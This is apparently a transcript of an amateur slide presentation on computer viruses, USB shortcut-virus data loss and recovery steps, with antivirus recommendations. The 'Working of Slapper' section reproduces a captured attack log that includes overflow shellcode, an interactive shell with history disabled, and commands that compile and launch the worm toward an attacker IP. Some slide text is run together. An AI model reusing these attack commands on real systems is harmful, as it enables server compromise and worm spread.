Post on 22-Jul-2015
transcript
Virus & Data Protection
– Research by DKSoft...
Definitions of Virus History of Virus Goal & Properties of VirusWorking of a Slapper (Worm Virus) Common experience of losing data
Overview of Virus History of Virus Special Types of Trojans (Major Type of Virus) Concept of latest Trojans Virus Program Execution Working of a Slapper (Worm Virus) Data loss Data Protection Recommended Anti-Virus Softwares
Agenda
Definitions of Virus History of Virus Goal & Properties of VirusWorking of a Slapper (Worm Virus) Common experience of losing data
Virus – Malicious program with set of destructive codes that startsreplicating to infect OS or user data when accessed it
Major Types of Viruses: Trojan Horse
Overview of Virus
Worm
Some Features of Virus: locates & infects “.exe”, “.com”, “.dll” files Delete Files, Shutdown Programs, Eat up System
resources, hide or alter data VB & Command Scripts contain Assembly code for
Virus replication (Optional)
Definitions of Virus History of Virus Goal & Properties of VirusWorking of a Slapper (Worm Virus) Common experience of losing data
Hex dump of a worm leaving message for Bill Gates III
1. Elk Cloner :
First real Virus written by Richard Skrenta for Apple II It will stick to all the disks It can also modify RAM
2. “Brain“ – First major PC Virus found in Lahore, Pakistan
Boot Sector of a Floppy infected by “Brain”
History of Virus
Special Types of Trojans
Exploit – Spread malicious data in OS
Backdoor – Created to give access of a Computer to unauthorized user
DDoS – Causes Web Address to fail
Tiny Trojan Banker – Steals Bank details of a user or organizaton
FakeAV – Convinces user that the PC is infected with Virus
Ransom – Designed for crime which modifies or blocks dataon a Computer & the data in the Computer
Downloader – Programmed to download & install newmalicious programs
Spy – Invisible to user & observes Computer activitiessilently by taking screenshots
SpyEye – Targets Airline Travel & Banking Websites
Zeus – Steals banking details & personal data, participatein fraud schemes & other criminal works
AIDS – Infects “.exe” & “.com” files
Concept of latest Trojan
Shortcut file--------------------Address------------X-----------Hidden Datacmd.exe------------opens-----------explorer.exe
Step 1: Waits till it is accessed by user or Anti-VirusStep 2: Sticks to specified System FilesStep 3: Permanently hides all Files & Folders present in External DrivesStep 4: Creates shortcuts of all the Files & Folders present in External DrivesStep 5: Opens particular File/Folder when its shortcut file is accessedStep 6: Some Virus uses VB or Command scripts for replication & some have
capacity to self replicate inside the all External Drives connected to the infected Computer
Shortcut----cmd.exe----explorer.exe----Hidden Data
The shortcut file is at front end & at back end, it contans address of the hidden data
Infected programNormal program
Start
End
Virus Program Execution
Working of Slapper
+
Slapper Requesting
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10
GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection:
close..Transfer-Encoding: chunked..Content-Type: text/html;
charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD
HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD>
<BODY>.<H1>Bad Request</H1>.Your browser sent a request that this
server could not understand.<P>.client sent HTTP/1.1 request
without hostname (see RFC2616 section 14.23): <P>. <HR>.
<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port
80</ADDRESS>.</BODY></HTML>...0....
68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....
127.0.0.1:80 -> 68.168.1.15:52160 :52160
Slapper Attacking
...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-
..............hjE.H.o.,B...."Oo...:.....'...i..%._~-
...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G
@AAAA............AAAAAAAA....................................1...
.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A
..1...Q[....1.Ph//shh/bin..PS.......
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export
HISTFILE=/dev/null; export
PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.
68.168.1.15:52312 -> 127.0.0.1:443
Compiling and Installing
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd
/tmp/update; exit; .
68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c
/tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu <<
__eof__; .begin 655 .unlock
[worm source code, in uuencoded format, omitted]
68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -
C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o
/tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update;
.
68.168.1.15:52312 -> 127.0.0.1:443
obs: XXXX XXXX == localhost IP
YYYY YYYY == worm_host IP
0x70 == Incomming client flag
127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)
0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@.@.......
0x0010 YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......
0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......
^^
Remote Communications
Data Loss
Firstly, when a Virus infected Pendrive is inserted to a non-infected PC, every data present in Pendrive will be in shortcut forms usually with 1KB or 2KB size (or more in rare cases)
Secondly, user will open a folder (shortcut file) & feels that entire the data is safe. But, this is when the virus spreads to the PC & all the External Devices connected in future
User scans & commands the Anti-Virus to take proper actions
Anti-Virus deletes shortcut files present in the scanned Pendrive
After scanning, user opens the scanned Pendrive. “OMG ! , I lost my important data”
The Virus re-appeared even in a non-infected Pendrive. It spreads & replicates in all non-infected/infected External USB Devices
Data Protection
When a virus infected Pendrive is inserted to a non-infected PC, note that every data present in Pendrive will be in shortcuts. Never touch the shortcut files.
Go to “Folder Options” present in “Control Panel”
Click on “View” tab present at the top of “Folder Options”
1. Mark “Show hidden files, folders and drives”2. Untick “Hide protected operating system files
(Recommended)”3. Again open the same Pendrive
VB Scrpt & its shortcut (Trojan Virus) containing code for Virus to replicate
Original User data permanently hidden
Trojan or Worm viruses (as shortcuts to the Original Data)
“.Trashes” file present at the top contains address of Recycle Bin
Properties of Trojan (shortcut)
Properties of user data folder
If files are present inside a folder, then they are 99.99% safe. It can be copied or moved to any other directories avoid data corruption
Scan & take a safe copy of required data from the hidden folder
Never touch the auto-created shortcut files or unknown files
Read Privacy Statements
Understand what you are getting before you agree to download or share your personal information
Think Before You Click
Be cautious with e-mail attachments and links
Only download files from Web sites you trust
Safely remove External Drives, Shutdown Computer properly & dontsave data in System Partititon
Use Power ISO, Win ISO, Ultra ISO, Magic ISOor any other Softwares for Data Backup
Virus can be kidnapped & kept inside “.iso” file as locker
Advantages of creating “.iso” Image Data
Easy to create Never corruptsMount to a Virtual Drive & Access at high speed Provides very tight security for data stored in it OS or Anti-Virus cannot modify or delete its data
without user’s permission Portable with all OS supporting “.iso” Image DataWill not compress Data
SkyLabs Kaspersky
Symantec Norton
ESET
Bitdefender
Trend Micro
AVG
MS Essentials
Recommended Anti-Virus based on security levelsRecommended Anti-Virus by popularity levels
SkyLabs Kaspersky
Bitdefender
Symantec Norton
MS Essentials
Trend Micro
AVG
ESET
– Research continued by DKSoft...
dksoft2015.blogspot.in